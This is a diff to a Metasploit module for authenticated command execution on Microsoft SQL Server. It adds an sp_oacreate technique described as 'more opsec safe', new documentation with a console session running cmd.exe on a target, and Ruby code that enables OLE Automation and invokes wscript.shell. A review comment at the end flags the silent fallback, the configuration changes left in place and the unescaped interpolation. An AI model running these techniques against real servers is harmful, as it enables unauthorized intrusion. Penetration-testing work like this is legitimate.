diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json
index 8fec530ce1cd..d04ddbf9684e 100644
--- a/db/modules_metadata_base.json
+++ b/db/modules_metadata_base.json
@@ -5166,7 +5166,7 @@
 "needs_cleanup": false
 },
 "auxiliary_admin/mssql/mssql_exec": {
- "name": "Microsoft SQL Server xp_cmdshell Command Execution",
+ "name": "Microsoft SQL Server xp_cmdshell / sp_oacreate Command Execution",
 "fullname": "auxiliary/admin/mssql/mssql_exec",
 "aliases": [
diff --git a/documentation/modules/auxiliary/admin/mssql/mssql_exec.md b/documentation/modules/auxiliary/admin/mssql/mssql_exec.md
new file mode 100644
index 000000000000..a2ae1ff6f66e
--- /dev/null
+++ b/documentation/modules/auxiliary/admin/mssql/mssql_exec.md
@@ -0,0 +1,35 @@
+## Description
+
+This module will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell (default) or the sp_oacreate procedure (more opsec safe, no output, no temporary data table). A valid username and password is required to use this module. The sp_oacreate function is used in metasploit to rebuild the xp_cmdshell stored procedure but can be used directly to get code execution which is the more opsec safe way.
+
+## Verification Steps
+
+1. Do: ```use use admin/mssql/mssql_exec```
+2. Do: ```set USERNAME [username1]```
+3. Do: ```set PASSWORD [password1]```
+3. Do: ```set TECHNIQUE sp_oacreate``` (optional, default is xp_cmdshell)
+4. Do: ```set RHOSTS [IP]```
+5. Do: ```set CMD [command]```
+6. Do: ```run```
+
+## Scenarios
+
+```
+msf > use use use admin/mssql/mssql_exec
+msf auxiliary(mssql_exec) > set USERNAME username1
+USERNAME => username1
+msf auxiliary(mssql_exec) > set PASSWORD password1
+PASSWORD => password1
+msf auxiliary(mssql_exec) > set TECHNIQUE sp_oacreate
+TECHNIQUE => sp_oacreate
+msf auxiliary(mssql_exec) > set RHOST 192.168.1.195
+RHOST => 192.168.1.195
+msf auxiliary(mssql_exec) > set CMD cmd.exe /c echo OWNED > C:\owned.txt
+CMD => cmd.exe /c echo OWNED > C:\owned.txt
+msf auxiliary(mssql_exec) > run
+
+[*] 192.168.1.195:1433 - Enable advanced options and ole automation procedures
+[*] 192.168.1.195:1433 - Executing command using sp_oacreate
+[*] Auxiliary module execution completed
+msf auxiliary(mssql_exec_oacreate) >
+```
\ No newline at end of file
diff --git a/modules/auxiliary/admin/mssql/mssql_exec.rb b/modules/auxiliary/admin/mssql/mssql_exec.rb
index 6cb62617211f..6eeb394b1b08 100644
--- a/modules/auxiliary/admin/mssql/mssql_exec.rb
+++ b/modules/auxiliary/admin/mssql/mssql_exec.rb
@@ -7,27 +7,58 @@ class MetasploitModule < Msf::Auxiliary
 include Msf::Exploit::Remote::MSSQL
 
 def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Microsoft SQL Server xp_cmdshell Command Execution',
- 'Description' => %q{
- This module will execute a Windows command on a MSSQL/MSDE instance
- via the xp_cmdshell procedure. A valid username and password is required
- to use this module
- },
- 'Author' => [ 'tebo ' ],
- 'License' => MSF_LICENSE,
- 'References' =>
- [
- [ 'URL', 'http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx'],
- ]
- ))
+ super(
+ update_info(
+ info,
+ 'Name' => 'Microsoft SQL Server Command Execution',
+ 'Description' => %q{
+ This module will execute a Windows command on a MSSQL/MSDE instance
+ via the xp_cmdshell (default) or the sp_oacreate procedure (more opsec safe, no output, no temporary data table).
+ A valid username and password is required to use this module.
+ },
+ 'Author' =>
+ [
+ 'tebo ',
+ 'arcc '
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx'],
+ [ 'URL', 'https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-oacreate-transact-sql'],
+ ]
+ )
+ )
 
- register_options( [
- OptString.new('CMD', [ false, 'Command to execute', 'cmd.exe /c echo OWNED > C:\\owned.exe']),
+ register_options([
+ OptString.new('CMD', [ false, 'Command to execute', 'cmd.exe /c echo OWNED > C:\\owned.exe']),
+ OptEnum.new('TECHNIQUE', [true, 'Technique that used for command execution', 'xp_cmdshell', ['xp_cmdshell', 'sp_oacreate']])
 ])
 end
 
 def run
- mssql_xpcmdshell(datastore['CMD'], true) if mssql_login_datastore
+ return unless mssql_login_datastore
+
+ technique = datastore['TECHNIQUE']
+ case technique
+ when 'xp_cmdshell'
+ begin
+ mssql_xpcmdshell(datastore['CMD'], true)
+ rescue RuntimeError
+ print_status('Error while running "xp_cmdshell" method...retrying with "sp_oacreate" method')
+ mssql_spoacreate
+ end
+ when 'sp_oacreate'
+ mssql_spoacreate
+ end
+ end
+
+ def mssql_spoacreate
+ doprint = datastore['VERBOSE']
+ print_status('Enable advanced options and ole automation procedures')
+ mssql_query("EXEC sp_configure 'show advanced options', 1; RECONFIGURE;", doprint)
+ mssql_query("EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;", doprint)
+ print_good('Executing command using sp_oacreate. No output will be displayed.')
+ mssql_query("DECLARE @mssql INT; EXEC sp_oacreate 'wscript.shell',@mssql OUTPUT; EXEC sp_oamethod @mssql, 'run', null, '#{datastore['CMD']}';", doprint)
 end
end
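Review bot: The `when 'xp_cmdshell'` branch in `run` falls through to `mssql_spoacreate` on any RuntimeError although the operator explicitly chose xp_cmdshell via TECHNIQUE, and that fallback flips `show advanced options` and `Ole Automation Procedures` with `sp_configure ... RECONFIGURE` and never restores them, so a server-wide configuration change the description sells as "more opsec safe" happens without being asked for and is left behind (such option changes are typically recorded in the SQL Server error log, which defenders can alert on). At minimum report the retry with `print_error` instead of `print_status`, and either restore the two options after the query or state in the Description that the module changes them. Separately, the last `mssql_query` in `mssql_spoacreate` interpolates `datastore['CMD']` unescaped inside a single-quoted T-SQL literal, so any `'` in CMD produces a syntax error; escape first, `cmd = datastore['CMD'].to_s.gsub("'", "''")`, and interpolate `cmd`. The new `'Name'` (`Microsoft SQL Server Command Execution`) also disagrees with the name this same commit writes to db/modules_metadata_base.json (`... xp_cmdshell / sp_oacreate Command Execution`), so one of the two is stale; the class header sits above the hunk.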